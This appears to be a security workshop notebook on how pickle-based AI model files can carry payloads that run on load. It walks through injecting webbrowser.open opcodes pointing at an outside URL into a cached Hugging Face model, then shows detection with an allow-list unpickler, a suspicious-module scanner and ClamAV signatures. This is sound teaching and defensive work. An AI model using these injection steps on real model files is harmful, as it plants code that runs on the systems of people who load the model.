# Models as Malware: Attacking and Defending the AI Supply Chain
The open-source model community is growing rapidly: Hugging Face hosts over 1.8 million publicly accessible models today.

Institutions and individuals alike leverage this platform to access and share state-of-the-art AI for deployment on a wide range of infrastructure, from personal devices to production systems.

Under the hood, many AI model formats contain both data (weights) and code (architecture), and most users rely on convenient but vulnerable serialization formats to distribute models. Attackers are taking notice, embedding payloads in models that connect to command-and-control (C2) servers:
- https://thehackernews.com/2025/02/malicious-ml-models-found-on-hugging.html (Feb 2025)
- https://arstechnica.com/security/2024/03/hugging-face-the-github-of-ai-hosted-code-that-backdoored-user-devices/ (Mar 2024)

In this session, you'll learn 1) how to instrument and detect malicious payloads in AI models and 2) how recent enhancements to ClamAV are protecting customers from supply chain compromises in the era of AI.

A working understanding of Python programming is expected.

# Analyze the new threat vector

## Load a safe model
In this case, it's a small GPT-style model trained on Shakespeare's plays. Feel free to try it out!

In [1]:
from transformers import AutoModel
model = AutoModel.from_pretrained("n8cha/nanoGPT-shakespeare-char", weights_only=False, trust_remote_code=True)

config.json:   0%|          | 0.00/388 [00:00<?, ?B/s]

model.py: 0.00B [00:00, ?B/s]

A new version of the following files was downloaded from https://huggingface.co/n8cha/nanoGPT-shakespeare-char:
- model.py
. Make sure to double-check they do not contain any added malicious code. To avoid downloading new versions of the code file, you can pin a revision.


pytorch_model.bin:   0%|          | 0.00/43.0M [00:00<?, ?B/s]

number of parameters: 10.67M


generation_config.json:   0%|          | 0.00/69.0 [00:00<?, ?B/s]

model.safetensors:   0%|          | 0.00/43.0M [00:00<?, ?B/s]

In [2]:
import torch

class CharTokenizer:
    def __init__(self):
        self.token_map = {'\n': 0, ' ': 1, '!': 2, '$': 3, '&': 4, "'": 5, ',': 6, '-': 7, '.': 8, '3': 9, ':': 10, ';': 11, '?': 12, 'A': 13, 'B': 14, 'C': 15, 'D': 16, 'E': 17, 'F': 18, 'G': 19, 'H': 20, 'I': 21, 'J': 22, 'K': 23, 'L': 24, 'M': 25, 'N': 26, 'O': 27, 'P': 28, 'Q': 29, 'R': 30, 'S': 31, 'T': 32, 'U': 33, 'V': 34, 'W': 35, 'X': 36, 'Y': 37, 'Z': 38, 'a': 39, 'b': 40, 'c': 41, 'd': 42, 'e': 43, 'f': 44, 'g': 45, 'h': 46, 'i': 47, 'j': 48, 'k': 49, 'l': 50, 'm': 51, 'n': 52, 'o': 53, 'p': 54, 'q': 55, 'r': 56, 's': 57, 't': 58, 'u': 59, 'v': 60, 'w': 61, 'x': 62, 'y': 63, 'z': 64}
        self.rev_map = {v: k for k, v in self.token_map.items()}

    def encode(self, text):
        try:
            return [self.token_map[c] for c in text]
        except KeyError as e:
            raise ValueError(f"Character not in vocabulary: {e.args[0]}")

    def decode(self, tokens):
        try:
            return ''.join(self.rev_map[t] for t in tokens)
        except KeyError as e:
            raise ValueError(f"Token not in vocabulary: {e.args[0]}")

tokenizer = CharTokenizer()

def generate(prompt):
    prompt_encoded = tokenizer.encode(prompt)
    x = (torch.tensor(prompt_encoded, dtype=torch.long, device="cpu")[None, ...])
    with torch.no_grad():
        y = model.generate(
            x,
            max_new_tokens=1000,
            temperature=0.8,
            top_k=200
        )
        return tokenizer.decode(y[0].tolist())

In [3]:
response = generate("O Romeo, Romeo, ") # This may take a while to run (~60s)
print(response)

O Romeo, Romeo, like the talk of death
Have no longer to do another blood.

MENENIUS:
But it was a brace of thee,
To make thy fellow to have one shadow:
For it is a well-a grave!

First Senator:
What satisfied?

VOLUMNIA:
Sir, the black down from the dukes
For merit, but not into the virtuous life
Of fasting but another of all the tempted like:
The prayers ever will blood to the extreme fear,
That thought you leave the foul purposed souls of yound days
And despair told me in his kindness,
May proclaim your ancient for a bush of feast,
Lest with a guilty plague may seem that with me;
And as I was this a bear, many as runs
Good cannot be will the be but knew'd,
And death happiness, means their courts, we have many inhabits
The hope of pleasure to die: 'tis so dear a tranion
To see him and pieces which we have been side a travell
That most desperate sleep in the cener? See, thou shamest;
And so, but if thou dost pity the allaying these
to make a death with a bloody man
That thus should be

## Instrument the model with (simulated) malware
During the guided session, we will use `pickle_editor.py` to instrument the serialized model file with malicious instructions.

The simulated exploit looks like this:
```
001: GLOBAL 'webbrowser open'
002: BINUNICODE 'https://pramuwaskito.org/hacker/'
003: BININT1 0
004: NEWTRUE
005: TUPLE3
006: REDUCE
```

1. `001: GLOBAL 'webbrowser open'`: Pushes the `webbrowser.open()` function onto the stack.
2. `002: BINUNICODE 'https://pramuwaskito.org/hacker/'`: Loads up the first parameter of `webbrowser.open()`, `url`.
3. `003: BININT1 0`: Loads up the second parameter of `webbrowser.open()`, `new`.
4. `004: NEWTRUE`: Loads up the third parameter of `webbrowser.open()`, `autoraise`. We'll use `True` for transparency.
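5. `005: TUPLE3`: Assembles the previous 3 items into a tuple (necessary to pass the items to `webbrowser.open()` all together).
6. `006: REDUCE`: Pops the callable and the argument tuple off the stack and calls `webbrowser.open(url, 0, True)`. This is the step that executes code while the model is being loaded.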
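
To watch this opcode sequence run end to end without opening a browser, the sketch below hand-assembles an equivalent pickle but swaps `webbrowser.open` for the harmless `builtins.print`. The helper name `build_payload` and the `example.invalid` URL are illustrative assumptions and are not part of `pickle_editor.py`.

```python
import io
import pickle
import pickletools
import struct
from contextlib import redirect_stdout


def build_payload(module: str, name: str, url: str) -> bytes:
    """Assemble the six opcodes from the listing above, plus a final STOP."""
    url_bytes = url.encode("utf-8")
    return b"".join([
        b"c" + f"{module}\n{name}\n".encode("ascii"),          # GLOBAL 'module name'
        b"X" + struct.pack("<I", len(url_bytes)) + url_bytes,  # BINUNICODE url
        b"K\x00",                                              # BININT1 0
        b"\x88",                                               # NEWTRUE
        b"\x87",                                               # TUPLE3
        b"R",                                                  # REDUCE (calls the callable)
        b".",                                                  # STOP, so the fragment is a complete pickle
    ])


# Harmless stand-in: print(url, 0, True) instead of webbrowser.open(url, 0, True).
payload = build_payload("builtins", "print", "https://example.invalid/")

# Disassemble without executing anything.
pickletools.dis(payload)

# Loading is what triggers the call; capture stdout to observe the side effect.
captured = io.StringIO()
with redirect_stdout(captured):
    result = pickle.loads(payload)

print("side effect during load:", repr(captured.getvalue()))
print("value returned by pickle.loads:", result)
```

The call happens inside `pickle.loads()` itself, so by the time any model code could run, the injected function has already executed.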

### Open the Pickle editor tool
Check the Hugging Face cache for the model files:
```shell
# Hugging Face stores the model data in a cache directory using the SHA256 checksum as the filename
# SHA256 of model: 174042ea4a88354667f5058c9fa8090140c9fdad6373e7f76dbaf4e17b92d575
# (see https://huggingface.co/n8cha/nanoGPT-shakespeare-char/blob/main/pytorch_model.bin)
ls -la ~/.cache/huggingface/hub/models--n8cha--nanoGPT-shakespeare-char/blobs
```
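
Because the blob's filename is meant to equal the SHA256 of its contents, a mismatch between the two is a cheap tamper signal. The following is a minimal sketch under that assumption; `sha256_of` and `blob_matches_name` are hypothetical helpers, not Hugging Face APIs, and the loop only looks at files whose names are 64 hexadecimal characters, since other cache entries may be named differently.

```python
import hashlib
import string
from pathlib import Path


def sha256_of(path: Path, chunk_size: int = 1 << 20) -> str:
    """Hash a file in chunks so large model files do not need to fit in memory."""
    digest = hashlib.sha256()
    with path.open("rb") as handle:
        for chunk in iter(lambda: handle.read(chunk_size), b""):
            digest.update(chunk)
    return digest.hexdigest()


def blob_matches_name(path: Path) -> bool:
    """True when the file's content hash equals its filename."""
    return sha256_of(path) == path.name


def looks_like_sha256(name: str) -> bool:
    return len(name) == 64 and all(c in string.hexdigits for c in name)


# Cache location taken from the shell command above; skipped if it does not exist.
blobs = Path.home() / ".cache/huggingface/hub/models--n8cha--nanoGPT-shakespeare-char/blobs"
if blobs.is_dir():
    for blob in sorted(blobs.iterdir()):
        if blob.is_file() and looks_like_sha256(blob.name):
            status = "ok" if blob_matches_name(blob) else "MISMATCH"
            print(f"{status:8} {blob.name}")
```

Run before and after the instrumentation step, a check like this should flip from `ok` to `MISMATCH` for the edited blob, since the editor changes the contents but not the filename.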

Save a copy of the "clean" model for later:
```shell
cp ~/.cache/huggingface/hub/models--n8cha--nanoGPT-shakespeare-char/blobs/174042ea4a88354667f5058c9fa8090140c9fdad6373e7f76dbaf4e17b92d575 ~/.cache/huggingface/hub/models--n8cha--nanoGPT-shakespeare-char/blobs/clean_174042ea4a88354667f5058c9fa8090140c9fdad6373e7f76dbaf4e17b92d575

ls -la ~/.cache/huggingface/hub/models--n8cha--nanoGPT-shakespeare-char/blobs
```

Instrument the original model with the malicious pickle opcodes listed above (this will open a `curses` editor):
```shell
python pickle_editor.py ~/.cache/huggingface/hub/models--n8cha--nanoGPT-shakespeare-char/blobs/174042ea4a88354667f5058c9fa8090140c9fdad6373e7f76dbaf4e17b92d575
```

## Test the exploit!
If everything worked, loading the tampered model runs the injected instructions and opens a web browser window to https://pramuwaskito.org/hacker/.

In [None]:
from transformers import AutoModel
model = AutoModel.from_pretrained("n8cha/nanoGPT-shakespeare-char", weights_only=False, trust_remote_code=True)
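
One common defense against this class of exploit is to refuse any global that is not explicitly allowed while unpickling, the pattern the Python `pickle` documentation describes as restricting globals. The sketch below uses only the standard library; the allow-list contents and the names `AllowListUnpickler` and `safe_loads` are assumptions for illustration, and this is not a description of how `transformers` loads models.

```python
import io
import pickle
import struct
from collections import OrderedDict

# Illustrative allow-list: only globals listed here may be resolved during load.
ALLOWED_GLOBALS = {("collections", "OrderedDict")}


class AllowListUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called for GLOBAL / STACK_GLOBAL before anything is imported or invoked.
        if (module, name) in ALLOWED_GLOBALS:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"blocked global: {module}.{name}")


def safe_loads(data: bytes):
    return AllowListUnpickler(io.BytesIO(data)).load()


# A benign pickle that only needs an allowed global loads normally.
loaded = safe_loads(pickle.dumps(OrderedDict(a=1)))
print("benign:", loaded)

# The exploit's opcode sequence (placeholder URL) is rejected at the GLOBAL
# opcode, so webbrowser.open is never resolved, let alone called.
url = b"https://example.invalid/"
evil = (b"cwebbrowser\nopen\n" + b"X" + struct.pack("<I", len(url)) + url
        + b"K\x00" + b"\x88" + b"\x87" + b"R" + b".")
try:
    safe_loads(evil)
    blocked = False
except pickle.UnpicklingError as error:
    blocked = True
    print("rejected:", error)
```

An allow-list fails closed: anything the loader has not been told about is rejected, which is the opposite of the default `pickle.load()` behavior exploited above.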

# Detect (and protect) with ... ClamAV?!?
There's a new model on Hugging Face every 7 seconds, and **manually analyzing the contents of every model simply will not scale**.

If only we could leverage the _tried and true_ tools in our toolkits today ... like **ClamAV**.

---

That's right, **ClamAV** can now detect malicious signatures in AI model files, and you can try it yourself right now!
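
To build intuition for what static detection can look for, the sketch below lists the imports a pickle references without ever loading it, then flags a few modules that a weights file has no obvious reason to import. It illustrates the general idea only and is not how ClamAV's engine or signatures work. The module list, the function names, and the assumption that a checkpoint is either a raw pickle or a zip archive containing `.pkl` members are all illustrative.

```python
import pickle
import pickletools
import zipfile

# Illustrative only: modules that are unusual inside a weights file.
SUSPICIOUS_MODULES = {"webbrowser", "os", "posix", "nt", "subprocess", "socket"}


def imports_in_pickle(data: bytes) -> list[tuple[str, str]]:
    """Return (module, name) pairs referenced by GLOBAL / STACK_GLOBAL opcodes."""
    found = []
    recent_strings = []  # heuristic operand tracking for STACK_GLOBAL
    for opcode, arg, _pos in pickletools.genops(data):
        if opcode.name == "GLOBAL":
            module, _, name = arg.partition(" ")
            found.append((module, name))
        elif opcode.name == "STACK_GLOBAL" and len(recent_strings) >= 2:
            found.append((recent_strings[-2], recent_strings[-1]))
        elif isinstance(arg, str):
            recent_strings.append(arg)
    return found


def pickles_in_file(path):
    """Yield (member_name, bytes) for each pickle stream found at path."""
    if zipfile.is_zipfile(path):
        with zipfile.ZipFile(path) as archive:
            for member in archive.namelist():
                if member.endswith(".pkl"):
                    yield member, archive.read(member)
    else:
        with open(path, "rb") as handle:
            yield str(path), handle.read()


def scan(path) -> list[tuple[str, str, str]]:
    """Return (member, module, name) for every suspicious import found."""
    return [
        (member, module, name)
        for member, data in pickles_in_file(path)
        for module, name in imports_in_pickle(data)
        if module.split(".")[0] in SUSPICIOUS_MODULES
    ]


# In-memory demo: parsing never imports or calls anything.
evil = b"cwebbrowser\nopen\nX\x01\x00\x00\x00aK\x00\x88\x87R."
print(imports_in_pickle(evil))
print(imports_in_pickle(pickle.dumps({"a": 1})))
```

A scanner like this is easy to evade (for example, through memoized strings or indirect imports), which is part of why a maintained signature database is attractive at scale.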

### Original model

```
> clamscan ~/.cache/huggingface/hub/models--n8cha--nanoGPT-shakespeare-char/blobs/clean_174042ea4a88354667f5058c9fa8090140c9fdad6373e7f76dbaf4e17b92d575

Loading:     7s, ETA:   0s [========================>]    8.72M/8.72M sigs
Compiling:   2s, ETA:   0s [========================>]       41/41 tasks

/nanoGPT-shakespeare-char/pytorch_model.bin: OK

----------- SCAN SUMMARY -----------
Known viruses: 8718486
Engine version: 1.4.2
Scanned directories: 0
Scanned files: 1
Infected files: 0
Data scanned: 62.07 MB
Data read: 41.00 MB (ratio 1.51:1)
Time: 0.501 sec (0 m 0 s)
Start Date: 2025:07:31 23:22:55
End Date:   2025:07:31 23:22:56
```

### Tampered model

```
> clamscan ~/.cache/huggingface/hub/models--n8cha--nanoGPT-shakespeare-char/blobs/174042ea4a88354667f5058c9fa8090140c9fdad6373e7f76dbaf4e17b92d575

Loading:     7s, ETA:   0s [========================>]    8.72M/8.72M sigs
Compiling:   2s, ETA:   0s [========================>]       41/41 tasks

/.cache/huggingface/hub/models--n8cha--nanoGPT-shakespeare-char/blobs/174042ea4a88354667f5058c9fa8090140c9fdad6373e7f76dbaf4e17b92d575: Py.Malware.NetAccess_webbrowser_G-10053733-0 FOUND

----------- SCAN SUMMARY -----------
Known viruses: 8718486
Engine version: 1.4.2
Scanned directories: 0
Scanned files: 1
Infected files: 1
Data scanned: 62.07 MB
Data read: 41.00 MB (ratio 1.51:1)
Time: 0.501 sec (0 m 0 s)
Start Date: 2025:07:31 23:22:55
End Date:   2025:07:31 23:22:56
```
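
When scanning many models, it helps to turn this report into structured data. The sketch below parses text shaped like the output above; `parse_clamscan` is a hypothetical helper, the sample path is a placeholder, and the line formats are assumed from this transcript rather than from a formal specification.

```python
def parse_clamscan(output: str) -> dict:
    """Extract detections and summary fields from clamscan's text report."""
    detections = []
    summary = {}
    in_summary = False
    for raw in output.splitlines():
        line = raw.strip()
        if "SCAN SUMMARY" in line:
            in_summary = True
        elif in_summary and ": " in line:
            key, _, value = line.partition(": ")
            summary[key] = value.strip()
        elif line.endswith(" FOUND"):
            # Shape: "<path>: <signature> FOUND"
            path, _, signature = line[: -len(" FOUND")].rpartition(": ")
            detections.append((path, signature))
    return {"detections": detections, "summary": summary}


# Sample modeled on the tampered-model scan; the path is a placeholder.
sample = """\
/path/to/blob: Py.Malware.NetAccess_webbrowser_G-10053733-0 FOUND

----------- SCAN SUMMARY -----------
Scanned files: 1
Infected files: 1
"""

report = parse_clamscan(sample)
print(report["detections"])
print(report["summary"]["Infected files"])
```

For simple pass/fail automation, `clamscan`'s exit status may be enough on its own: its man page documents 0 for no virus found, 1 for virus(es) found, and 2 for errors.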

### Clean up the Hugging Face cache
If you'd like to remove the instrumented model, simply clear out the Hugging Face cache, and a fresh copy of the model will be pulled the next time `from_pretrained()` is invoked:
```shell
rm -rf ~/.cache/huggingface/hub/models--n8cha--nanoGPT-shakespeare-char
```

## We hope you enjoyed this exercise and would love to stay in touch!
**Nathan**: [LinkedIn](https://www.linkedin.com/in/thisisnathanchang/), [GitHub](https://github.com/n8cha), `nathchan at cisco dot com`

**Roee**: [LinkedIn](https://www.linkedin.com/in/rlandesman/), [GitHub](https://github.com/ri-roee), `roeeland at cisco dot com`